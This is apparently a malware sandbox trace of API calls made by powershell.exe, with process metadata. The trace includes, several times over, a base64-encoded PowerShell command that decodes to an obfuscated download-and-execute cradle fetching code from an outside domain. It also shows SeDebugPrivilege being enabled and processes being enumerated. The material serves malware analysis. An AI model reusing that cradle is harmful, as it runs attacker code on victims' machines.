	[0858.359] FindNextFileW (in: hFindFile=0x47dab0, lpFindFileData=0x1c82dcf0 | out: lpFindFileData=0x1c82dcf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0858.359] FindClose (in: hFindFile=0x47dab0 | out: hFindFile=0x47dab0) returned 1
	[0858.359] SetErrorMode (uMode=0x1) returned 0x1
	[0858.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c82de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0858.361] SetErrorMode (uMode=0x1) returned 0x1
	[0858.361] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c82e010 | out: lpFileInformation=0x1c82e010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0858.361] SetErrorMode (uMode=0x1) returned 0x1
	[0858.362] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0858.362] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0858.362] CoTaskMemFree (pv=0x41f240) 
	[0858.364] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0858.364] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0858.364] CoTaskMemFree (pv=0x41f240) 
	[0859.662] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0859.662] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0859.662] CoTaskMemFree (pv=0x41f240) 
	[0859.672] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0859.673] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0859.673] CoTaskMemFree (pv=0x41f240) 
	[0859.689] CoTaskMemAlloc (cb=0x3b) returned 0x1b8b7650
	[0859.690] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c82e1f8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c82e1f8) returned 0x4550
	[0859.693] CoTaskMemFree (pv=0x1b8b7650) 
	[0859.696] GetConsoleWindow () returned 0x1048e
	[0861.012] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0861.012] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0861.012] CoTaskMemFree (pv=0x41f240) 
	[0861.013] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0861.013] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0861.013] CoTaskMemFree (pv=0x41f240) 
	[0861.019] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0861.020] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0861.020] CoTaskMemFree (pv=0x41f240) 
	[0861.022] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c82e240 | out: pNumArgs=0x1c82e240) returned 0x1b89d710*=""
	[0861.024] lstrlenW (lpString="-EncodedCommand") returned 15
	[0861.025] CoTaskMemAlloc (cb=0x22) returned 0x1b8afd50
	[0861.025] RtlMoveMemory (in: Destination=0x1b8afd50, Source=0x1b89d732, Length=0x20 | out: Destination=0x1b8afd50) 
	[0861.025] CoTaskMemFree (pv=0x1b8afd50) 
	[0861.025] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0861.025] CoTaskMemAlloc (cb=0x2f4) returned 0x1b8a2130
	[0861.025] RtlMoveMemory (in: Destination=0x1b8a2130, Source=0x1b89d752, Length=0x2f2 | out: Destination=0x1b8a2130) 
	[0861.025] CoTaskMemFree (pv=0x1b8a2130) 
	[0861.026] LocalFree (hMem=0x1b89d710) returned 0x0
	[0861.027] CoTaskMemAlloc (cb=0x804) returned 0x1b8c1700
	[0861.027] GetConsoleTitleW (in: lpConsoleTitle=0x1b8c1700, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0861.028] CoTaskMemFree (pv=0x1b8c1700) 
	[0861.039] CoTaskMemAlloc (cb=0x38e) returned 0x1b89d710
	[0861.039] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c82e1a0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3161710 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x3161710*(hProcess=0x360, hThread=0x35c, dwProcessId=0x247c, dwThreadId=0x2480)) returned 1
	[0865.558] CoTaskMemFree (pv=0x1b89d710) 
	[0865.560] CloseHandle (hObject=0x35c) returned 1
	[0865.560] CoTaskMemAlloc (cb=0x3b) returned 0x1b8b7650
	[0865.560] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c82e248, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c82e248) returned 0x4550
	[0865.560] CoTaskMemFree (pv=0x1b8b7650) 
	[0865.565] GetCurrentProcess () returned 0xffffffffffffffff
	[0865.565] GetCurrentProcess () returned 0xffffffffffffffff
	[0865.566] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x360, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c82e328, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c82e328*=0x35c) returned 1

Process:
	id = "79"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x20bbb000"
	os_pid = "0xe88"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 364
	os_tid = 0xea4

	[0670.299] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0676.723] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0676.723] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0676.723] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0676.723] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0710.566] GetVersionExW (in: lpVersionInformation=0x12dfe0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dfe0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0710.569] GetVersionExW (in: lpVersionInformation=0x12dfe0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dfe0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0710.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0710.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0710.583] GetVersionExW (in: lpVersionInformation=0x12dd50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dd50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0710.584] SetErrorMode (uMode=0x1) returned 0x1
	[0710.585] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12deb0 | out: lpFileInformation=0x12deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0710.586] SetErrorMode (uMode=0x1) returned 0x1
	[0713.503] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12e120 | out: lpdwHandle=0x12e120) returned 0x94c
	[0713.506] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cc72f0 | out: lpData=0x2cc72f0) returned 1
	[0713.508] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12e098, puLen=0x12e090 | out: lplpBuffer=0x12e098*=0x2cc738c, puLen=0x12e090) returned 1
	[0713.510] lstrlenW (lpString="䅁") returned 1
	[0713.519] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x2cc7468, puLen=0x12e000) returned 1
	[0713.520] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0713.522] CoTaskMemAlloc (cb=0x2e) returned 0x2f5720
	[0713.522] lstrcpyW (in: lpString1=0x2f5720, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0713.523] CoTaskMemFree (pv=0x2f5720) 
	[0713.523] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x2cc74bc, puLen=0x12e000) returned 1
	[0713.523] lstrlenW (lpString="System.Management.Automation") returned 28
	[0713.523] CoTaskMemAlloc (cb=0x3c) returned 0x219860
	[0713.523] lstrcpyW (in: lpString1=0x219860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0713.523] CoTaskMemFree (pv=0x219860) 
	[0713.523] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x2cc7518, puLen=0x12e000) returned 1
	[0713.523] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0713.524] CoTaskMemAlloc (cb=0x20) returned 0x2f3930
	[0713.524] lstrcpyW (in: lpString1=0x2f3930, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0713.524] CoTaskMemFree (pv=0x2f3930) 
	[0713.524] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x2cc7558, puLen=0x12e000) returned 1
	[0713.524] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0713.524] CoTaskMemAlloc (cb=0x44) returned 0x219860
	[0713.524] lstrcpyW (in: lpString1=0x219860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0713.524] CoTaskMemFree (pv=0x219860) 
	[0713.524] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x2cc75c0, puLen=0x12e000) returned 1
	[0713.524] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0713.524] CoTaskMemAlloc (cb=0x76) returned 0x281460
	[0713.524] lstrcpyW (in: lpString1=0x281460, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0713.524] CoTaskMemFree (pv=0x281460) 
	[0713.524] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x2cc765c, puLen=0x12e000) returned 1
	[0713.524] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0713.524] CoTaskMemAlloc (cb=0x44) returned 0x219860
	[0713.524] lstrcpyW (in: lpString1=0x219860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0713.524] CoTaskMemFree (pv=0x219860) 
	[0713.524] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x2cc76c0, puLen=0x12e000) returned 1
	[0713.524] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0713.524] CoTaskMemAlloc (cb=0x58) returned 0x2a1eb0
	[0713.524] lstrcpyW (in: lpString1=0x2a1eb0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0713.525] CoTaskMemFree (pv=0x2a1eb0) 
	[0713.525] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x2cc773c, puLen=0x12e000) returned 1
	[0713.525] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0713.525] CoTaskMemAlloc (cb=0x20) returned 0x2f3930
	[0713.525] lstrcpyW (in: lpString1=0x2f3930, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0713.525] CoTaskMemFree (pv=0x2f3930) 
	[0713.525] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x2cc73e4, puLen=0x12e000) returned 1
	[0713.525] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0713.525] CoTaskMemAlloc (cb=0x66) returned 0x25c4b0
	[0713.525] lstrcpyW (in: lpString1=0x25c4b0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0713.525] CoTaskMemFree (pv=0x25c4b0) 
	[0713.525] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x0, puLen=0x12e000) returned 0
	[0713.525] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x0, puLen=0x12e000) returned 0
	[0713.525] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12e008, puLen=0x12e000 | out: lplpBuffer=0x12e008*=0x0, puLen=0x12e000) returned 0
	[0713.525] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12dfd8, puLen=0x12dfd0 | out: lplpBuffer=0x12dfd8*=0x2cc738c, puLen=0x12dfd0) returned 1
	[0713.526] CoTaskMemAlloc (cb=0x204) returned 0x283fa0
	[0713.526] VerLanguageNameW (in: wLang=0x0, szLang=0x283fa0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0713.528] CoTaskMemFree (pv=0x283fa0) 
	[0713.528] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\", lplpBuffer=0x12e028, puLen=0x12e020 | out: lplpBuffer=0x12e028*=0x2cc7318, puLen=0x12e020) returned 1
	[0713.534] GetCurrentProcessId () returned 0xe88
	[0716.128] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12cf50 | out: lpLuid=0x12cf50*(LowPart=0x14, HighPart=0)) returned 1
	[0716.131] GetCurrentProcess () returned 0xffffffffffffffff
	[0716.132] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x12cf70 | out: TokenHandle=0x12cf70*=0x2dc) returned 1
	[0716.132] AdjustTokenPrivileges (in: TokenHandle=0x2dc, DisableAllPrivileges=0, NewState=0x2ccab68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0716.134] CloseHandle (hObject=0x2dc) returned 1
	[0716.138] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe88) returned 0x2dc
	[0716.147] EnumProcessModules (in: hProcess=0x2dc, lphModule=0x2ccabd0, cb=0x200, lpcbNeeded=0x12df88 | out: lphModule=0x2ccabd0, lpcbNeeded=0x12df88) returned 1
	[0716.152] GetModuleInformation (in: hProcess=0x2dc, hModule=0x13f370000, lpmodinfo=0x2ccae40, cb=0x18 | out: lpmodinfo=0x2ccae40*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0716.154] CoTaskMemAlloc (cb=0x804) returned 0x2fb8c0
	[0716.154] GetModuleBaseNameW (in: hProcess=0x2dc, hModule=0x13f370000, lpBaseName=0x2fb8c0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0716.155] CoTaskMemFree (pv=0x2fb8c0) 
	[0716.156] CoTaskMemAlloc (cb=0x804) returned 0x2fb8c0
	[0716.156] GetModuleFileNameExW (in: hProcess=0x2dc, hModule=0x13f370000, lpFilename=0x2fb8c0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0716.156] CoTaskMemFree (pv=0x2fb8c0) 
	[0716.157] CloseHandle (hObject=0x2dc) returned 1
	[0716.165] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xe88) returned 0x2dc
	[0716.166] GetExitCodeProcess (in: hProcess=0x2dc, lpExitCode=0x12e0b8 | out: lpExitCode=0x12e0b8*=0x103) returned 1
	[0718.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ccb088, Length=0x20000, ResultLength=0x12e080 | out: SystemInformation=0x12ccb088, ResultLength=0x12e080*=0x3ca78) returned 0xc0000004
	[0718.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ceb0b8, Length=0x3f278, ResultLength=0x12e080 | out: SystemInformation=0x12ceb0b8, ResultLength=0x12e080*=0x3ca78) returned 0x0
	[0719.869] EnumWindows (lpEnumFunc=0x2c466ac, lParam=0x0) returned 1
	[0719.871] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.871] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x558
	[0719.871] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.871] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.871] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.871] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x538
	[0719.871] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.872] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x778
	[0719.872] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x778
	[0719.872] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.872] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.872] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.872] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
	[0719.872] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x12dde0 | out: lpdwProcessId=0x12dde0) returned 0x4d0
